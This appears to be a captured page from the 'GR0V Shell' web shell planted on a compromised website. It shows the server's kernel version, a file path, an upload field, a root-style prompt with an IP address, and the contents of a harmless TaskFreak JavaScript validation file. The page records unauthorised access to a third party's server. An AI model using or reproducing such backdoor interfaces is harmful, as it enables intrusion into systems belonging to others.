? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/ittask/js/
File Upload :
Current File : /home/admin/public_html/old/ittask/js/member.js

/****************************************************************************\
* TaskFreak!                                                                 *
* multi user                                                                 *
******************************************************************************
* Version: 0.6.3                                                             *
* Authors: Stan Ozier <taskfreak@gmail.com>                                  *
* License:  http://www.gnu.org/licenses/gpl.txt (GPL)                        *
\****************************************************************************/

function check_search(ff) {
	e = gE('flulab_error');
	if (!ff.keyword.value && !ff.country.selectedIndex && !ff.stateCode.selectedIndex) {
		e.innerHTML = 'Please use at least one of the search filters';
		sD(e);
		return false;
	} else {
		b= gE('flulab_submit1');
		b.disabled = true;
		b.value = 'Searching...';
		hD(e);
		return true;
	}
}

T1KUS90T
  root-grov@210.1.60.28:~$